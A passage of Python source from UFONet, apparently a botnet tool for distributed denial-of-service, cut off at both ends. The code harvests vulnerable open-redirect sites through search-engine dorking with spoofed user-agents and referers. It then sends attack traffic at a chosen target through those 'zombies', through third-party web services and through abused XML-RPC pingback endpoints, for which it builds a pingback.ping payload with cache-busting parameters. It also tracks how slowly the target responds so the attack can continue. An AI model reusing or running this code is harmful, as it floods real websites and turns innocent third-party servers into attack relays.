update_reply = input("[AI] You would also like to update other content: [News] [Missions] [Grid] [Board]... (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("\n[AI] "+self.exit_msg+"\n")
return
else:
try:
update_gui = self.update_gui_data() # update GUI data
except:
print('-'*25 +"\n")
print("[Error] [AI] Something wrong downloading GUI content! -> [Aborting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
return
def uploading_github_list(self):
print(" 0. Set a different URL (if required) for code repository sources:\n\n [current: "+self.github_zombies+"]\n")
print(" 1. Test your 'zombies' to upload only those that really work (ex: ufonet --test-all).")
print(" 2. Make a -PULL REQUEST- to the owner of the code repository.")
print(" 3. Share your updates in the #UFONet 'motherships'...\n")
print('='*22 + '\n')
print("[AI] "+self.exit_msg+"\n")
def create_web_interface(self):
# launch webserver+gui
from .webgui import ClientThread
import webbrowser
host = '0.0.0.0'
port = 9999
try:
webbrowser.open('http://127.0.0.1:9999', new=1)
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tcpsock.bind((host,port))
while True:
tcpsock.listen(4)
(clientsock, (ip, port)) = tcpsock.accept()
newthread = ClientThread(ip, port, clientsock)
newthread.start()
except (KeyboardInterrupt, SystemExit):
sys.exit()
def extract_dorks(self):
# extract dorks from file (ex: 'dorks.txt')
try:
f = open(self.dorks_file)
dorks = f.readlines()
dorks = [ dork.replace('\n','') for dork in dorks ]
f.close()
if not dorks:
if not options.autosearch:
print("[Error] [AI] [Control] Cannot retrieve [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
return
else:
return dorks
except:
if not options.autosearch:
if os.path.exists(self.dorks_file) == True:
print("[Error] [AI] [Control] Cannot open [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("[Error] [AI] [Control] Cannot found [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
return
def search_zombies(self, dork, zombies_found):
# crawlering on search engine results to extract zombies
options = self.options
zombies = []
if not options.engine: # default search engine
options.engine = 'duck'
if options.engine == 'bing': # using bing [28/02/2019: OK!]
url = 'https://www.bing.com/search?'
if options.search: # search from query
q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
if options.dorks or options.autosearch: # search from a dork
q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
start = 0 # set index number of first entry
query_string = { 'q':q, 'first':start }
data = urllib.parse.urlencode(query_string)
url = url + data
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.verbose:
print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
print('[Error] [AI] Unable to connect to: bing\n')
if options.allengines or options.autosearch:
return
if not options.dorks or not options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
return #sys.exit(2)
else:
req_reply = ''
regex = '<li class="b_algo"><h2><a href="(.+?)">' # regex magics
pattern = re.compile(regex)
url_links = re.findall(pattern, req_reply)
elif options.engine == 'yahoo': # yahoo [28/02/2019: OK!]
location = ['fr', 'de', 'es', 'nl', 'it', 'se', 'ch', 'jp', 'ru', 'lt'] # evading Yahoo anti-dorking [grey magic: 28/02/2019]
#location = ['fr', 'de', 'es', 'nl', 'se', 'ch', 'ru'] # [08/04/2017]
location = str(random.choice(location).strip()) # shuffle location
if location == "jp": # [28/02/2019]
url = 'https://search.yahoo.co.jp/search?'
else:
url = 'https://'+location+'.search.yahoo.com/search?'
if options.search: # search from query
if location == "jp":
q = '"' + str(options.search) + '"' # set query to search literally on results
else:
q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
if options.dorks or options.autosearch: # search from a dork
if location == "jp":
q = '"' + str(dork) + '"' # set query to search literally on results
else:
q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
start = 0 # set index number of first entry
query_string = { 'p':q, 'b':start }
data = urllib.parse.urlencode(query_string)
url = url + data
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.verbose:
print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
print('[Error] [AI] Unable to connect to: yahoo\n')
if options.allengines or options.autosearch:
return
if not options.dorks or not options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'bing'")
return #sys.exit(2)
else:
req_reply = ''
#regex = '<h3 class="title"><a style="color:#2C46C7" class=" td-u" href="(.+?)" target="_blank"' # regex magics [18/08/2016]
regex = 'href="(.+?)" target="_blank" data' # regex magics [08/04/2017]
pattern = re.compile(regex)
url_links = re.findall(pattern, req_reply)
elif options.engine == 'duck': # using duckduckgo [28/02/2019: OK!]
url = 'https://duckduckgo.com/html/'
if options.search: # search from query
q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
if options.dorks or options.autosearch: # search from a dork
q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
query_string = { 'q':q }
data = urllib.parse.urlencode(query_string)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.verbose:
print("[Info] [AI] [DORKING] Query used: " + url + " (POST: "+ data + ")\n")
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, data.encode('utf-8'), headers) # HTTP POST request
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
print('[Error] [AI] Unable to connect to: duck\n')
if options.allengines or options.autosearch:
return
if not options.dorks or not options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
return #sys.exit(2)
else:
req_reply = ''
regex = 'snippet" href="(.+?)">' # regex magics
pattern = re.compile(regex)
url_links = re.findall(pattern, req_reply)
else: # no valid search engine
print('[Error] [AI] This search engine is not supported!\n')
if not options.dorks or options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
return #sys.exit(2)
else:
req_reply = ''
if options.num_results: # set number of results to search
try:
num = int(options.num_results)
except:
print("[Info] [AI] You should specify an integer!... Using default value: 10\n")
num = 10
else:
num = 10
total_results = 1
for url in url_links: # general parse on urls
if int(num) < int(total_results):
break
if options.engine == "bing":
if " h=" in url: # regex magics [18/08/2016]
url = url.rsplit('" h=',1)[0]
if options.engine == "yahoo":
if 'RU=' in url: # regex magics [18/08/2016]
url = url.rsplit('RU=',1)[1]
if 'UTF-8&u=' in url: # regex magics [05/02/2018]
url = url.rsplit('UTF-8&u=',1)[1]
total_results = total_results + 1 # results counter
url_link = urllib.parse.unquote(url) # unquote encoding
if options.search:
sep = str(options.search)
if options.dorks or options.autosearch:
sep = str(dork)
url_link = url_link.rsplit(sep, 1)[0] + sep
if 'href="' in url_link:
url_link = url_link.rsplit('href="', 1)[1]
if "instreamset" in url_link: # invalid zombie
url_link = "" # discarded
if '" ' in url_link:
url_link = url_link.rsplit('" ', 1)[1]
if options.engine in url_link:
url_link = "" # discarded
if 'http' not in url_link:
url_link = "" # discarded
else:
if url_link not in zombies and url_link+os.linesep not in zombies_found and url_link != "": # AI mode (parsing search engines mixed pool and stored army)
print('+Victim found: ' + url_link)
zombies.append(url_link)
else:
pass
if len(zombies) == 0: # print dorking results
print("[Info] [AI] NOT any NEW victim(s) found for this query!\n")
if not options.dorks:
if not options.autosearch:
if not self.options.forceyes:
return #sys.exit(2)
self.total_possible_zombies = self.total_possible_zombies + len(zombies)
print("")
return zombies
def check_nat(self):
# check for NAT configuration
options = self.options
tor_reply = urllib.request.urlopen(self.check_tor_url).read().decode('utf-8') # check if TOR is enabled
your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip()
check_ip_service = None
if not tor_reply or 'Congratulations' not in tor_reply:
print("[Info] [AI] It seems that you are not using TOR to recieve data. -> [OK!]\n")
else:
print("[Error] [AI] You are using TOR as public IP... It's not possible to NAT! -> [Aborting!]\n")
self.nat_error_flag = "ON"
return #sys.exit(2)
try:
data = str(urlopen(self.check_ip_service1).read()) # check for public ip
self.pub_ip = re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1)
check_ip_service = self.check_ip_service1
except:
try: # another check for public ip
data = str(urlopen(self.check_ip_service2).read())
self.pub_ip = re.compile(r'">(\d+\.\d+\.\d+\.\d+)</span>').search(data).group(1)
check_ip_service = self.check_ip_service2
except:
print("[Error] [AI] Something wrong checking your public IP! -> [Exiting!]\n")
self.nat_error_flag = "ON"
return
t = urlparse(check_ip_service)
name_service = t.netloc
print(" + Public: " + self.pub_ip + " | "+name_service+"\n")
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 0)) # connecting to a UDP address doesn't send packets (black magic)
self.local_ip = s.getsockname()[0]
print(" + Local: " + self.local_ip + "\n")
print('='*22 + '\n')
def extract_ucavs(self):
# extract ucavs from file
options = self.options
try:
f = open(self.ucavs_file)
ucavs = f.readlines()
ucavs = [ ucav.replace('\n','') for ucav in ucavs ]
f.close()
if not ucavs:
print("[Info] [AI] [Control] Cannot retrieve [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
self.options.disableucavs = True
return
else:
return ucavs
except:
if os.path.exists(self.ucavs_file) == True:
print("[Info] [AI] [Control] Cannot open [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
return #sys.exit(2)
else:
print("[Info] [AI] [Control] Cannot found [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
return #sys.exit(2)
def discarding_ucavs(self, ucav, ucavs):
if ucav in self.discard_ucavs:
ucavs.remove(ucav)
if self.options.verbose:
print(("[Info] [AI] [Control] [UCAVs] "+str(ucav)+" is not working! -> [Discarding!]"))
self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
return ucavs
def send_ucavs(self, ucavs):
# extract external status checkers, perform a request and check results
time.sleep(5) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not ucavs: # return when not any working
self.options.disableucavs = True
return
options = self.options
target = self.options.target
shuffle(ucavs) # shuffle ucavs order, each round :-)
if not self.options.disablepurge:
for ucav in ucavs:
if not ucav.startswith('http'): # discarded inmediately
self.discard_ucavs.append(ucav)
self.num_discard_ucavs = self.num_discard_ucavs + 1
ucavs = self.discarding_ucavs(ucav, ucavs) # check if ucav is failing for autobalance army
if not self.options.disablepurge:
if not ucavs: # return when not any working
self.options.disableucavs = True
return
shuffle(ucavs) # shuffle ucavs order, each discarding check :-)
for ucav in ucavs:
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if target.startswith("http://"): # parse target for some checkers
target = target.replace('http://','')
elif target.startswith("https://"):
target = target.replace('https://','')
url = ucav + target
t = urlparse(ucav)
name_ucav = t.netloc
if name_ucav == "":
name_ucav = ucav
if options.verbose:
print(("[Info] [UCAVs] Sniping: " + url))
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if options.timeout: # set timeout
ucav_timeout = options.timeout
else:
ucav_timeout = 5
if ucav_timeout < 1:
ucav_timeout = 5
req = urllib.request.Request(url, None, headers)
target_reply = urllib.request.urlopen(req, context=self.ctx, timeout=ucav_timeout).read().decode('utf-8')
self.ucavs_hit = self.ucavs_hit + 1 # add ucav hit to stats
except:
print("[Info] [UCAVs] " + name_ucav + " -> FAILED (cannot connect!)")
if not self.options.disablepurge:
self.discard_ucavs.append(ucav)
self.num_discard_ucavs = self.num_discard_ucavs + 1
self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
target_reply = ""
if target_reply == "": # check for target's status resolved by [UCAVs]
pass
else:
if not "is down" or not "looks down" or not "No info found for host" in target_reply: # parse external service for reply
print("[Info] [UCAVs] " + name_ucav + " -> Target is ONLINE! -> [Keep shooting!]")
self.num_is_up = self.num_is_up + 1
else:
print("[Info] [UCAVs] " + name_ucav + " -> Target looks OFFLINE! -> [Checking!]")
self.num_is_down = self.num_is_down + 1
if self.options.verbose:
print("[Info] [AI] [UCAVs] "+str(name_ucav)+" is returning...")
self.extra_zombies_lock = False # [ARMY] have finished
def extract_median(self, num_list):
# extract median from a list of numbers
import statistics
int_num = []
for num in num_list:
num = float(num)
int_num.append(num)
return statistics.median(int_num)
def check_is_loading(self, target):
# perform a broadband test (using GET) to analize target's reply to the traffic generated each round
self.start = None
self.stop = None
print('\n---------')
print("\n[Info] [AI] Scanning target to check for levels on defensive shields...\n")
if target.endswith(""):
target.replace("", "/")
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
try:
req = urllib.request.Request(target, None, headers)
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
self.start = time.time()
target_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
header = urllib.request.urlopen(req, context=self.ctx).info()
self.stop = time.time()
except:
print('[Info] [AI] Our scanner cannot connect to the target this round! -> [Skipping!]\n')
return
try:
s, size_name = self.convert_size(len(target_reply))
self.loadcheck_size_list.append(s) # add record to size list
size = '%s %s' % (s,size_name)
except:
size = "Error!"
try:
time_required = self.stop - self.start
load = self.convert_time(time_required)
self.loadcheck_load_list.append(load) # add record to load list
except:
load = "Error!"
self.loadcheck_counter = self.loadcheck_counter + 1
print(' -Total tests:', self.loadcheck_counter, "\n")
if self.loadcheck_prev_size is not None and self.loadcheck_prev_load is not None:
lsm = self.extract_median(self.loadcheck_size_list)
if lsm is not None:
self.loadcheck_size_median = str(lsm) + " " + size_name
else:
self.loadcheck_size_median = None
llm = self.extract_median(self.loadcheck_load_list)
if llm is not None:
self.loadcheck_load_median = str(llm) + " seconds"
else:
self.loadcheck_load_median = None
if self.loadcheck_counter == 2: # first round
print(' -Bytes in (first round) :', self.loadcheck_first_size)
print(' -Bytes in (this round) :', size)
if self.loadcheck_size_median is not None:
print(' -Bytes in (median) :', self.loadcheck_size_median)
print(' ----')
print(' -Load time (first round) :', self.loadcheck_first_load, "seconds")
print(' -Load time (this round) :', load, "seconds")
if self.loadcheck_load_median is not None:
print(' -Load time (median) :', self.loadcheck_load_median, "\n")
else:
print("\n")
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.loadcheck_load_max = None
self.loadcheck_load_min = None
elif self.loadcheck_counter > 2: # rest of rounds
lsmax = max(self.loadcheck_size_list)
if lsmax is not None:
self.loadcheck_size_max = str(lsmax) + " " + size_name
else:
self.loadcheck_size_max = None
lsmin = min(self.loadcheck_size_list)
if lsmin is not None:
self.loadcheck_size_min = str(lsmin) + " " + size_name
else:
self.loadcheck_size_min = None
llmax = max(self.loadcheck_load_list)
if llmax is not None:
self.loadcheck_load_max = str(llmax) + " seconds"
else:
self.loadcheck_load_max = None
llmin = min(self.loadcheck_load_list)
if llmin is not None:
self.loadcheck_load_min = str(llmin) + " seconds"
else:
self.loadcheck_load_min = None
print(' -Bytes in (first round) :', self.loadcheck_first_size)
print(' -Bytes in (previous round) :', self.loadcheck_prev_size)
print(' -Bytes in (this round) :', size)
if self.loadcheck_size_max is not None:
print(' -Bytes in (max) :', self.loadcheck_size_max)
if self.loadcheck_size_min is not None:
print(' -Bytes in (min) :', self.loadcheck_size_min)
if self.loadcheck_size_median is not None:
print(' -Bytes in (median) :', self.loadcheck_size_median)
print(' ----')
print(' -Load time (first round) :', self.loadcheck_first_load, "seconds")
print(' -Load time (previous round):', self.loadcheck_prev_load, "seconds")
print(' -Load time (this round) :', load, "seconds")
if self.loadcheck_load_max is not None:
print(' -Load time (max) :', self.loadcheck_load_max)
if self.loadcheck_load_min is not None:
print(' -Load time (min) :', self.loadcheck_load_min)
if self.loadcheck_load_median is not None:
print(' -Load time (median) :', self.loadcheck_load_median, "\n")
else:
print("\n")
if self.loadcheck_prev_load < load: # target is loading more slowly
print("[Info] [AI] [Scanner] Target is serving the content more slowly this round! ;-) -> [Keep shooting!]\n")
elif self.loadcheck_prev_load == load: # inmutable target
print("[Info] [AI] [Scanner] Attack is not having any effect on your target this round... -> [Keep shooting!]\n")
elif self.loadcheck_prev_load > load: # is target defending?
print("[Info] [AI] [Scanner] Target is loading this round faster than the previous one! -> DETECTED: [PROXY CACHE!!]\n")
else:
print(' -Bytes in (this round) :', size)
print(' -Load time (this round):', load, "seconds\n")
self.loadcheck_first_size = size
self.loadcheck_first_load = load
self.loadcheck_size_median = None
self.loadcheck_load_median = None
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.loadcheck_load_max = None
self.loadcheck_load_min = None
self.loadcheck_prev_size = size # record previous size
self.loadcheck_prev_load = load # record previous load
def convert_size(self, size):
if (size == 0):
return '0 B'
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size,1024)))
p = math.pow(1024,i)
s = round(size/p,2)
return s, size_name[i]
def convert_time(self, time):
return '%.2f' % time
def discarding_zombies(self, zombie, zombies):
if zombie in self.discardzombies:
zombies.remove(zombie)
if self.options.verbose:
print(("[Info] [AI] [Control] [Zombies] "+str(zombie)+" is not working! -> [Discarding!]"))
return zombies
def send_zombies(self, zombies):
# send Open Redirect zombies
time.sleep(1) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not zombies:
self.empty_zombies = True
return
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [Zombies] with 'maser-melee' weapons...")
options = self.options
target = self.options.target
shuffle(zombies) # shuffle zombies order, each round :-)
if not self.options.disablepurge:
for zombie in zombies: # check if zombie is failing for autobalance army
if not zombie.startswith('http'): # discarded inmediately
self.discardzombies.append(zombie)
self.num_discard_zombies = self.num_discard_zombies + 1
zombies = self.discarding_zombies(zombie, zombies)
if not self.options.disablepurge:
if not zombies: # return when not any working
self.empty_zombies = True
return
for zombie in zombies:
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
if not self.options.attackme:
print("[Info] [Zombies] Attacking from: " + name_zombie)
else: # on attackme, target url is dynamic -> http://public_ip:port/hash|zombie
self.mothership_hash = random.getrandbits(128) # generating random evasion hash
target = "http://" + str(self.pub_ip) + ":" + self.port + "/"+ str(self.mothership_hash) + "|" + zombie
self.options.target = target
print("[Info] [Zombies] Attacking: " + str(self.pub_ip) + ":" + self.port + " -> [LAN]" + self.local_ip + ":" + self.port)
print("[Info] [Zombies] Payload: " + target)
print('='*55, "\n")
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
if not options.target.startswith('http'):
if options.forcessl:
options.target = "https://" + options.target
else:
options.target = "http://" + options.target
self.attack_mode = True
try:
if options.verbose:
print("[Info] [Zombies] Sniping: " + options.target)
self.connect_zombies(zombie)
if self.options.dbstress: # try to stress db on target by using vulnerable Open Redirect web servers
self.db_flash = self.db_flash + 1
stress = self.stressing(target, zombie)
except Exception:
print("[Info] [Zombies] " + zombie + " -> FAILED (cannot connect!)")
self.total_zombies_failed_connection = self.total_zombies_failed_connection + 1 # used to manage threading pool
if not self.options.disablepurge:
self.discardzombies.append(zombie)
self.num_discard_zombies = self.num_discard_zombies + 1
if self.options.verbose:
print("[Info] [AI] [Zombies] "+str(name_zombie)+" is returning...")
self.attack_mode = False
def discarding_aliens(self, alien, aliens):
if alien in self.discard_aliens:
aliens.remove(alien)
if self.options.verbose:
print(("[Info] [AI] [Control] [Aliens] "+str(alien)+" is not working! -> [Discarding!]"))
self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
return aliens
def send_aliens(self, aliens):
# extract external web abuse services urls (POST) and perform requests against target
time.sleep(2) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not aliens: # return when not any working
self.options.disablealiens = True
return
target = self.options.target
options = self.options
shuffle(aliens) # shuffle aliens
if not self.options.disablepurge:
for alien in aliens:
if not alien.startswith('http'): # discarded inmediately
self.discard_aliens.append(alien)
self.num_discard_aliens = self.num_discard_aliens + 1
aliens = self.discarding_aliens(alien, aliens) # check if alien is failing for autobalance army
if not self.options.disablepurge:
if not aliens: # return when not any working
self.options.disablealiens = True
return
shuffle(aliens) # shuffle aliens order, each discarding check :-)
for alien in aliens:
name_alien = None
if "$POST" in alien: # extract alien/parameters -> search for $POST delimiter on 'aliens.txt' file
regex_alien = re.compile('{}(.*){}'.format(re.escape(''), re.escape(';$POST'))) # regex magics
pattern_alien = re.compile(regex_alien)
alien_url = re.findall(pattern_alien, alien) # HTTP POST url for submit data
regex_param = re.compile('{}(.*){}'.format(re.escape('$POST;'), re.escape(''))) # regex magics
pattern_param = re.compile(regex_param)
param = re.findall(pattern_param, alien) # HTTP POST params to submit
for u in alien_url:
url = u # ex: POST -> path/submit.php
t = urlparse(url)
name_alien = t.netloc
if name_alien == "":
name_alien = alien
print("[Info] [Aliens] Attacking from: " + name_alien)
for p in param:
param_target = {p : target} # ex POST -> url=target
param_target = urllib.parse.urlencode(param_target)
try:
if options.verbose:
print("[Info] [Aliens] Sniping: " + url + " - POST:", param_target)
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if self.options.timeout: # set timeout
try:
alien_timeout = int(self.options.timeout)
except:
alien_timeout = 5
else:
alien_timeout = 5
if alien_timeout < 1:
alien_timeout = 5
req = urllib.request.Request(url, param_target.encode('utf-8'))
rsp = urllib.request.urlopen(req, context=self.ctx, timeout=alien_timeout)
self.aliens_hit = self.aliens_hit + 1 # add hit to aliens stats
except Exception:
print("[Info] [Aliens] " + name_alien + " -> FAILED (cannot connect!)")
self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
if not self.options.disablepurge:
self.discard_aliens.append(alien)
self.num_discard_aliens = self.num_discard_aliens + 1
else:
print(("[Info] [Aliens] "+str(alien)+" -> FAILED (invalid alien!)"))
self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
if not self.options.disablepurge:
self.discard_aliens.append(alien)
self.num_discard_aliens = self.num_discard_aliens + 1
if self.options.verbose:
if name_alien:
print("[Info] [AI] [Aliens] "+str(name_alien)+" is returning...")
else:
print("[Info] [AI] [Aliens] "+str(alien)+" is returning...")
if self.options.disabledroids and self.options.disablerpcs and self.options.disableucavs:
self.extra_zombies_lock = False # [ARMY] have finished
def extract_aliens(self):
# extract aliens from file
options = self.options
try:
f = open(self.aliens_file)
aliens = f.readlines()
aliens = [ alien.replace('\n','') for alien in aliens ]
f.close()
if not aliens:
print("[Info] [AI] [Control] Cannot retrieve [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
self.options.disablealiens = True
return
else:
return aliens
except:
if os.path.exists(self.aliens_file) == True:
print("[Info] [AI] [Control] Cannot open [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
return #sys.exit(2)
else:
print("[Info] [AI] [Control] Cannot found [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
return #sys.exit(2)
def discarding_droids(self, droid, droids):
if droid in self.discard_droids:
droids.remove(droid)
if self.options.verbose:
print(("[Info] [AI] [Control] [Droids] "+str(droid)+" is not working! -> [Discarding!]"))
self.droids_fail = self.droids_fail + 1 # add fail to droids stats
return droids
def send_droids(self, droids):
# extract external web abuse services urls (GET) and perform requests against target
time.sleep(3) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not droids: # return when not any working
self.options.disabledroids = True
return
target = self.options.target
try:
target = urllib.parse.unquote(target).decode('utf8') # parte urlencoding
except:
target = urllib.parse.unquote(target)
if target.startswith('http://'): # remove http
target = target.replace('http://', '')
if target.startswith('https://'):
target = target.replace('https://', '') # remove https
options = self.options
shuffle(droids) # shuffle droids
if not self.options.disablepurge:
for droid in droids:
if not droid.startswith('http'): # discarded inmediately
self.discard_droids.append(droid)
self.num_discard_droids = self.num_discard_droids + 1
droids = self.discarding_droids(droid, droids) # check if droid is failing for autobalance army
if not self.options.disablepurge:
if not droids: # return when not any working
self.options.disabledroids = True
return
shuffle(droids) # shuffle droids order, each discarding check :-)
for droid in droids:
name_droid = None
if "$TARGET" in droid: # replace droid/parameter for target
url = droid.replace("$TARGET", target)
t = urlparse(url)
name_droid = t.netloc
if name_droid == "":
name_droid = droid
print("[Info] [Droids] Attacking from: " + name_droid)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Content-type' : "application/x-www-form-urlencoded", 'Referer' : self.referer, 'Connection' : 'keep-alive'} # set fake headers
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if self.options.timeout: # set timeout
try:
droid_timeout = int(self.options.timeout)
except:
droid_timeout = 5
else:
droid_timeout = 5
if droid_timeout < 1:
droid_timeout = 5
req = urllib.request.Request(url, None, headers)
rsp = urllib.request.urlopen(req, context=self.ctx, timeout=droid_timeout)
self.droids_hit = self.droids_hit + 1 # add hit to droids stats
except Exception:
print("[Info] [Droids] " + name_droid + " -> FAILED (cannot connect!)")
self.droids_fail = self.droids_fail + 1 # add fail to droids stats
if not self.options.disablepurge:
self.discard_droids.append(droid)
self.num_discard_droids = self.num_discard_droids + 1
else:
print("[Info] [Droids] " + str(droid) + " -> FAILED (invalid droid!)")
self.droids_fail = self.droids_fail + 1 # add fail to droids stats
if not self.options.disablepurge:
self.discard_droids.append(droid)
self.num_discard_droids = self.num_discard_droids + 1
if self.options.verbose:
if name_droid:
print("[Info] [AI] [Droids] "+str(name_droid)+" is returning...")
else:
print("[Info] [AI] [Droids] "+str(droid)+" is returning...")
if self.options.disablerpcs and self.options.disableucavs:
self.extra_zombies_lock = False # [ARMY] have finished
def extract_droids(self):
# extract droids from file
options = self.options
try:
f = open(self.droids_file)
droids = f.readlines()
droids = [ droid.replace('\n','') for droid in droids ]
f.close()
if not droids:
print("[Info] [AI] [Control] Cannot retrieve [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
self.options.disabledroids = True
return
else:
return droids
except:
if os.path.exists(self.droids_file) == True:
print("[Info] [AI] [Control] Cannot open [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
return #sys.exit(2)
else:
print("[Info] [AI] [Control] Cannot found [Droids] from: 'botnet/droids.txt' -> [Discarding!]")
return #sys.exit(2)
def discarding_rpcs(self, rpc, rpcs):
if rpc in self.discard_rpcs:
rpcs.remove(rpc)
if self.options.verbose:
print(("[Info] [AI] [Control] [X-RPCs] "+str(rpc)+" is not working! -> [Discarding!]"))
return rpcs
def send_rpcs(self, rpcs):
# extract vulnerable XML-RPC pingback services and perform requests against target
time.sleep(4) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not rpcs: # return when not any working
self.options.disablerpcs = True
return
target = self.options.target
options = self.options
def random_key(length):
key = ''
for i in range(length):
key += random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
return key
shuffle(rpcs) # shuffle rpcs
if not self.options.disablepurge:
for rpc in rpcs:
if not rpc.startswith('http'): # discarded inmediately
if not self.options.disablepurge:
self.discard_rpcs.append(rpc)
self.num_discard_rpcs = self.num_discard_rpcs + 1
self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
rpcs = self.discarding_rpcs(rpc, rpcs) # check if rpc is failing for autobalance army
if not self.options.disablepurge:
if not rpcs: # return when not any working
self.options.disablerpcs = True
return
shuffle(rpcs) # shuffle rpcs order, each discarding check :-)
for rpc in rpcs:
t = urlparse(rpc)
name_rpc = t.netloc
if name_rpc == "":
name_rpc = rpc
print("[Info] [X-RPCs] Attacking from: " + name_rpc)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
key = random_key(8) # generate random value page to bypass cache
rpc_page = "?" + str(key)
key = random_key(6) # re-generate random value id to bypass cache
rpc_id = "=" + str(key)
target_place = target + rpc_page + rpc_id # random place to bypass cache (ex: www.target.com?U7OvBdp1=4lMcNj)
if "/xmlrpc.php" in rpc:
rpc_place = rpc.replace("xmlrpc.php", "")
rpc_exploit = "<methodCall><methodName>pingback.ping</methodName><params><param><value><string>"+target_place+"</string></value></param><param><value><string>"+rpc_place+"</string></value></param></params></methodCall>"
try:
